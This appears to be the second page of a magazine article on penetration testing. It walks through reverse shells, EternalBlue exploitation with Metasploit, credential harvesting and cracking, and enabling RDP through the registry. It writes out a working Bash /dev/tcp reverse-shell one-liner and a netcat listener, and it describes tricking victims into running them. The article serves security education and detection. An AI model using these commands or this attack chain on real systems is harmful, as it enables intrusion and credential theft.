« Previous 1 2
Improved defense through pen testing
Black Hat, White Hat
Reverse Shell with Metasploit or Bash
Known as the "handler," the reverse shell allows you create an exploit to attack a system. All you do is deliver the code to a victim through social engineering or another exploit, and you're in. With a reverse shell, you set a local port and IP address to which the victim system connects back. Then, once an individual clicks on the file, the victim system immediately connects back to your system. You can then proceed to take control of the victim's system.
The sequence begins with Computer A (the victim system) receiving the following code:
$ bash -I <& /dev/tcp/10.0.0.1/444 0<&1
that causes Computer A to connect to Computer B (the attacking system that receives the connection from Computer A), which then runs:
$ nc -l -p 444 | more
To get this attack going, a pen tester could use Metasploit's Meterpreter shell to issue a command to listen for the reverse shell. Figure 5 shows how you would navigate to the appropriate directory (e.g., windows/x64/meterpreter/reverse_tcp
). Once there, you can set the IP addresses and ports (Figure 6) and simply listen for a connection back from the victim system (e.g., Computer A).
Of course, you don't have to use Metasploit to get an attack going. For example, notice the following attack sequence in Figures 7 and 8. In Figure 7, james@jamesvb1 is the victim system. Its user has just issued a relatively simple Bash command that opens port 4444 on the local system (see the "Who Initiates the Connection, Anyway?" box). This Bash command also ties that port to a Bash terminal that has full root access and tells the system to go look for a remote system with the IP address 10.0.0.1. Once the command is issued, the attacker simply needs to be listening for it using either Metasploit's Meterpreter shell or a simple listener.
Who Initiates the Connection, Anyway?
When pen testing, at least two systems are involved, as you might expect: the attacker system that uses exploit code to compromise the remote system and the attacked system, which has an open port created by exploit payload code.
Yes, that's pretty obvious. But, when you create a reverse shell, knowing who acted first can be a bit confusing because, from the network's point of view, the victim system is the one initiating first contact over the network. Many folks who don't do pen testing expect the attacking system to make first contact. So do many intrusion detection systems, especially if they're left at their default settings.
In the case of a reverse shell, though, it very much appears that the victim system is the one taking the first step to initiate that first connection. After all, IDSs and SIEM tools are never aware of the true first "out of band" contact that initially sets the stage for the reverse shell attack. That first out of band connection is the social engineering (or other exploit) that helped deliver the malware code in the first place.
Hackers and pen testers use commands like this all of the time. Last month, I was talking to a friend who works for a company that monitors Fortune 50 banks and other financial institutions. I mentioned this type of attack and asked if it was too old to discuss. He said it is, in fact, the most common attack vector he and his company see all day long. All an attacker has to do is trick someone into clicking on a file with this command embedded in it.
To create a simple listener, you don't even need Meterpreter. In Figure 8, james@parrot
is the attacker and is using only the netcat (nc
) application. This command opens port 4444 and listens for anything. Once the reverse connection is made, you can see that user has full root access to the victim system. Notice that the attacker has a terminal open on a standard Parrot system and then issues the nc
command. Almost immediately, the attacker is then given a new shell from jamesvb1
, which DNS identifies as s1.stangernet.com
.
Figures 9 and 10 show another sequence. In Figure 9, the user has opened an unauthenticated Bash shell that the attacker exploits in Figure 10. The IP address of this system is 10.0.2.20. This particular script could easily be executed within a shell script or even by an unsuspecting user. Figure 10 then shows how attacker 10.0.2.20 opens a simple Bash shell and connects to the remote system with netcat.
Notice that in the above case, the attacker was able to obtain two things: (1) the content of a user's password hash, as found in the /etc/shadow
file, and (2) the content of file q1_2018_finance.xls
, which is quite possibly very important confidential company data.
Additional Actions and Attacks
Now the attacker has the opportunity to use his or her imagination and engage in various activities (e.g., establish persistence; manipulate data; steal data, known as "data egress" in many circles; or upgrade the connection). Although the EternalBlue exploit was leaked by the Shadow Brokers group in 2017, it is still used successfully all around the world. If you don't believe me, try using Shodan or some other tool to find all of the older, public-facing Windows systems that have port 445 open. Metasploit has created a fairly useful environment to exploit it.
Security analysts and pen testers from around the world still see successful exploits conducted on systems that can't be updated easily. Most of these systems are used to control industrial control and SCADA systems.
The following are typical moves a pen tester can take to automate this attack using Meterpreter. As shown in Figure 11, you navigate to the /windows/smb/ms17_010_psexec/
directory, set the local and remote IP addresses and ports, and compile the code. With the run
command, you then connect to the victim system. You're in! As you can see, the Metasploit Framework console (msf) now has a "handler" program ready to conduct additional exploits.
For example, you can now engage in some credential harvesting. Figure 12 shows how you can upload the Windows Credentials Editor (WCE) from the /usr/share/wce/
directory. This file allows you to obtain user credentials easily from a Windows Security Account Manager (SAM). Notice that I'm doing this from within the already-established reverse shell that I created earlier. Once I upload the wce64.exe
file, I can then execute it; it will discover any particular user credentials that exist.
In this case, I was able to grab the credentials for a default account that has been activated. Notice the portion of the readout outlined in white. This is the most important element, because it is the Windows SAM hash for a particular user. Now that you have obtained this hash, you can decrypt it using any resource you want, such as John the Ripper. In my case, I've decided to use an online password cracking tool (Figure 13).
The result is that I have now been able to crack at least one user account. I now can go any number of directions. To avoid creating further IoCs, I could simply close down my connection and walk up to the victim system and log in "interactively."
Or, I could take further action with a Meterpreter shell
command. For example, there's no reason to limit yourself to grabbing just one password. Using the lsa_dump_secrets
command, I can obtain historical passwords listed in the SAM database (Figure 14). These are passwords that are no longer in use, but can be very, very useful when exploiting other systems.
I don't need to limit myself to obtaining old passwords, of course. Once I've opened a shell using my reverse TCP connection, I can then use the reg add
command to modify the registry of the Windows system (Figure 15).
In this example, I've added a Windows registry entry that activates the RDP in the victim system. All I have to do now is use RDP from any system I like and connect using the login credentials I've harvested. As a pen tester rather than a hacker, I wouldn't do anything nefarious, of course.
Conclusion
The job of a pen tester is to create "noise," artifacts, and IoCs that help security analysts improve the thresholds of their intrusion detection systems. By listening carefully to my activities, security analysts can create customized, useful signatures for IDSs such as Bro or Snort. As a pen tester, I have the opportunity to automate and coordinate many of these activities. Doing so helps me save time, as well as get more creative when faced with a particular task.
You don't have to limit yourself to Metasploit and reverse shells, but these tools provide excellent examples of what pen testers are able to do with a vulnerable system. Stay tuned for a future article, when I show how each of the steps discussed in this article can be detected by a good security analyst with the right tools.
Infos
- "Open source intelligence tools for pen testing" by James Stanger, ADMIN , issue 45, 2018, pg. 20, http://www.admin-magazine.com/Archive/2018/45/Open-source-intelligence-tools-for-pen-testing
- Cyber Kill Chain: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html
- MITRE ATT&CK: https://attack.mitre.org
« Previous 1 2
Buy this article as PDF
(incl. VAT)